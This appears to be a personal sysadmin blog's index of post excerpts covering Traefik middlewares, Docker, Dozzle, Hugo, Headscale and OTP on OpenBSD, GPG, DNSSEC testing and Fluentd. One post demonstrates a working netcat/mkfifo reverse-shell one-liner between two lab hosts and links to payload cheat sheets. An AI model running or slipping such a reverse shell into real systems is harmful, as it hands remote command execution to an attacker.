Docker - Traefik - Stripprefix

Strip Prefix Let’s assume you have a URL “https://whoami.your.domain.de/removeme" and you wanna get rid of the “removeme” before passing the Request to the Webserver. Stripprefix is your friend … docker-compose.yml whoami: image: containous/whoami labels: - "traefik.enable=true" - "traefik.http.middlewares.test-stripprefix.stripprefix.prefixes=/wegdamit,/removeme" - "traefik.http.routers.whoami.middlewares=test-stripprefix@docker" - "traefik.http.routers.whoami.rule=Host(`whoami.your.domain.de`)" - "traefik.http.routers.whoami.tls.certresolver=letsencrypt" - "traefik.http.routers.whoami.tls=true" sha256: 0620c0c2d7ae033f2536f6797a048772e52a09119367f4864f8bb2a754d2ea57

Docker - Traefik - Ratelimiting

docker-compose.yml let’s limit the Requests to 10 Req / 10 Seconds. whoami: image: containous/whoami labels: - "traefik.enable=true" - "traefik.http.middlewares.test-ratelimit.ratelimit.average=10" - "traefik.http.middlewares.test-ratelimit.ratelimit.burst=0" - "traefik.http.middlewares.test-ratelimit.ratelimit.period=10s" - "traefik.http.routers.whoami.middlewares=test-ratelimit@docker" - "traefik.http.routers.whoami.rule=Host(`whoami.your.domain.de`)" - "traefik.http.routers.whoami.tls.certresolver=letsencrypt" - "traefik.http.routers.whoami.tls=true" restart container docker compose -f docker-compose.yml up -d Test Limiting with Curl user@docker:~$ while true; do echo $(date); curl -s https://whoami.your.domain.de |grep "Too" ; sleep 0.1; done Wed Oct 12 18:43:57 CEST 2022 Too Many Requests Wed Oct 12 18:43:58 CEST 2022 Too Many Requests Wed Oct 12 18:43:58 CEST 2022 Too Many Requests Test Limit with hey, 10 Concurrent 100 Requests, 10 Concurrent, Wait 1 Second between Poll

Docker - Dozzle - Realtime Logs

Dozzle is a real-time log viewer for docker containers URL https://dozzle.dev/ https://github.com/amir20/dozzle Pull Image and start Container docker pull amir20/dozzle:latest docker run --name dozzle -d --volume=/var/run/docker.sock:/var/run/docker.sock -p 8888:8080 amir20/dozzle:latest Docker Compose version: "3" services: dozzle: container_name: dozzle image: amir20/dozzle:latest volumes: - /var/run/docker.sock:/var/run/docker.sock ports: - 8888:8080 You’re now exposing all your logfiles to the Internet on Port 8888. Apply some FW Rules on the Host, on the Cloud Provider or wherever it fit’s for you ….

Docker on Debian

Let’s Setup Docker on Debian https://docs.docker.com/engine/install/debian/ https://www.youtube.com/watch?app=desktop&v=PgICQblfWeY Get Debian on some Cloud Provider Update Apt apt-get install ca-certificates curl gnupg lsb-release add official GPG Keys mkdir -p /etc/apt/keyrings curl -fsSL https://download.docker.com/linux/debian/gpg |gpg --dearmor -o /etc/apt/keyrings/docker.gpg add Repo to Sources echo \ "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.gpg] https://download.docker.com/linux/debian \ $(lsb_release -cs) stable" |tee /etc/apt/sources.list.d/docker.list > /dev/null install Docker Engine apt-get update apt-get install docker-ce docker-ce-cli containerd.io docker-compose-plugin Check Version docker version root@docker:~# docker version Client: Docker Engine - Community Version: 20.

Hugo - Start

GoHugo from Scratch https://gohugo.io/ Take a fresh VM with OpenBSD ;) otherwise, you have to adapt appropriate … install pkg Login as User which is part of the “wheel group”. Doas should allow all Users of the Wheel Group to get root. doas pkg_add hugo-- nginx-- adduser webmaster create a user “webmaster” and prepare virtual directories doas adduser webmaster doas mkdir /var/www/virtual doas chown webmaster /var/www/virtual/ Update Nginx we need to modify nginx, prepare a site folder and a basic config for the webserver.

Headscale - Real World Example

Tailscale on Public Intrnet Setup Let’s build a few machines around the world and get our hands dirty with headscale / tailscale. headscale amsterdam tailscale stockholm miami singapore sydney goal is to build a fullmesh network with all 4 tailscale clients Headscale Server install OpenBSD 7.2 (needs golang 1.19) as described here Generate Install Key let’s generate a reusable install key for all 4 clients. It’s valid for 1 hour.

Headscale - OpenBSD

Running Headscale Server on OpenBSD i like and widely use wireguard for my infrastructure. i’m also aware of it’s limitation and i know the tailscale project but never gave try. recently, i stumbled upon the headscale project, an opensource alternative to for the (closed) tailscale server. perfect, let’s give a try! and, of course, i’m gooing to implement this with OpenBSD, what else ;) Doku https://github.com/juanfont/headscale/blob/main/docs/running-headscale-openbsd.md https://zakaria.org/posts/headscale-setup.md on the Server compile and install server this is working on OpenBSD 7.

OpenBSD & OTP

i don’t like ssh & password authentication. but sometime, specially during setup or recovery, it’s need and make sense. thought i’ll protect some boxes with otp. here a few notes and instrucations Build login_otp git clone https://github.com/reyk/login_otp cd login_otp make obj make all doas make install Initialize OTP DB doas otp -i Generate Key for User otp -g Name: stoege Key: xxxx xxxx xxxx xxxx xxxx xxxx xx URL: otpauth://totp/stoege?secret=xxxxxxxxxxxxxxxxxxxxxxxxxx&issuer=&algorithm=SHA1&digits=6&period=30 Build QR Code echo "otpauth://totp/stoege?

Url Shortener for CLI

CLI Url Shortener wrote a little URL Shortener in Python with FastAPI and a wrapper script for cli usage. needs httpie & jq packages. python backend is under development, cli wrapper for different os right here … Usage somehost$ ./myurlshort usage: /usr/local/bin/myurlshort http://veeeeeeeeeeeeeeeeeeeeeeeeeery.long.url.to anyhost$ ./myurlshort http://my-url-to-short.egal.world.planet.universe https://url.stoege.net/xXxXx CLI Wrappers OpenBSD cat << 'EOF' > myurlshort #!/usr/bin/env bash # url shortener for openbsd, v1.0, 2022-09-12, by @stoege which jq >/dev/null || ( echo -e "*** jq not installed ***\ndoas pkg_add jq\n"; ) which https >/dev/null || ( echo -e "*** httpie not installed ***\ndoas pkg_add httpie\n"; ) if [[ $# -ne 1 ]]; then echo -e "\nusage: $0 http://veeeeeeeeeeeeeeeeeeeeeeeeeery.

macOS

some adaption for macOS Shell macOS is using zsh since while. If you wanna switch back to bash, here some Notes …" Switch to Bash chsh -s /bin/bash install brew the famous package manager for macOS /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" install keychain if you work with ssh agent, you may wanna try keychain … brew install keychain build .bash_profile this will overwrite your existing .bash_profile cp ~/.bash_profile ~/.bash_profile.$(date "+%s")~ cat << 'EOF' > ~/.

GPG & Gopass & Gitlab

GPG and how to use it Create a Key with ECC gpg --expert --full-generate-key (9) ECC and ECC (1) Curve 25519 0 = key does not expire (or whatever you prefer!) Real name: Max Muster Email address: max@muster.net Comment: - pub ed25519 2022-09-04 [SC] 256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E uid Max Muster (-) <max@muster.net> sub cv25519 2022-09-04 [E] Public Key max@host $ gpg /home/max/.gnupg/pubring.kbx ---------------------------- pub ed25519 2022-09-04 [SC] 256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E uid [ultimate] Max Muster (-) <max@muster.

OpenBSD - ReverseShell

Reverse Shells https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md https://kb.systemoverlord.com/security/postex/reverse/ Test it Listen on Host A Set Lister on Host A (192.168.1.100) hostA # nc -l 4242 Start Reverse Shell on Host B hostB # rm /tmp/f; mkfifo /tmp/f; /bin/sh -i 2>&1 </tmp/f |nc 192.168.1.100 4242 >/tmp/f here we are hostA # hostname hostA.somewhere hostA # nc -l 4242 hostB # hostname hostB.somewhere nice ;) sha256: 0a5d01e633e102b0f3e258db89028946a247ef2296eab8dbf8819bc7472779c3

PuffyPages

some cool pages about OpenBSD https://www.openbsd.org https://man.openbsd.org https://www.openbsdfoundation.org https://marc.info https://undeadly.org/cgi?action=front https://bsdly.blogspot.com/ https://obsd.solutions/en/blog/ https://dataswamp.org/~solene/ https://blog.apnic.net/2021/10/28/openbsd-part-1-how-it-all-started/ + https://blog.apnic.net/2021/11/05/openbsd-part-2-why-use-openbsd/ https://vincentdelft.be/category/openbsd http://ratfactor.com/openbsd/2022-08-02-install https://blog.lambda.cx/tags/openbsd/ https://www.openbsdjumpstart.org/#/ https://blog.lambda.cx/posts/openbsd-introduction-talk/openbsd-introduction.pdf https://why-openbsd.rocks/fact/ https://openbsdrouterguide.net/ https://blog.obtusenet.com/ http://kestrel.nmt.edu/~raymond/software/howtos/openbsd.html sha256: a86099a13463c50993ce9fa2d75543daf1888454259f04daab6240c8a6dec7e9

DNSSEC - OARC Size Tester

Talk from @mwl at BSDCAN 2022 https://www.youtube.com/watch?v=1n62VZj-CKI OARC Reply Size Tester dig +short rs.dns-oarc.net TXT Host1 - good :) # dig +short rs.dns-oarc.net TXT rst.x4090.rs.dns-oarc.net. rst.x4058.x4090.rs.dns-oarc.net. rst.x4064.x4058.x4090.rs.dns-oarc.net. "45.15.80.80 DNS reply size limit is at least 4090" "45.15.80.80 sent EDNS buffer size 4096" Host2 - bad :( # dig +short rs.dns-oarc.net TXT rst.x1196.rs.dns-oarc.net. rst.x1206.x1196.rs.dns-oarc.net. rst.x1204.x1206.x1196.rs.dns-oarc.net. "74.63.25.240 DNS reply size limit is at least 1206" "74.63.25.240 sent EDNS buffer size 1232" sha256: 110b220f93eff767b7e4d488294b00ede4f4509258d0148704b145df79fa9821

Fluent - Data Collector

Fluentd is an open-source data collector for a unified logging layer. Fluentd allows you to unify data collection and consumption for better use and understanding of data. Docu https://docs.fluentd.org/ http://fluentular.herokuapp.com/ Install Ruby pkg_add ruby-3.1.2 Set Symlinks ln -sf /usr/local/bin/ruby31 /usr/local/bin/ruby ln -sf /usr/local/bin/bundle31 /usr/local/bin/bundle ln -sf /usr/local/bin/bundler31 /usr/local/bin/bundler ln -sf /usr/local/bin/erb31 /usr/local/bin/erb ln -sf /usr/local/bin/gem31 /usr/local/bin/gem ln -sf /usr/local/bin/irb31 /usr/local/bin/irb ln -sf /usr/local/bin/rdoc31 /usr/local/bin/racc ln -sf /usr/local/bin/rake31 /usr/local/bin/rake ln -sf /usr/local/bin/rdoc31 /usr/local/bin/rbs ln -sf /usr/local/bin/rdoc31 /usr/local/bin/rdbg ln -sf /usr/local/bin/rdoc31 /usr/local/bin/rdoc ln -sf /usr/local/bin/ri31 /usr/local/bin/ri ln -sf /usr/local/bin/typeprof31 /usr/local/bin/typeprof Install Fluentd gem install fluentd more Symlinks ln -sf /usr/local/bin/fluentd31 /usr/local/bin/fluentd Create Config fluentd --setup /etc/fluent Edit config cat << 'EOF ' > /etc/fluent/fluent.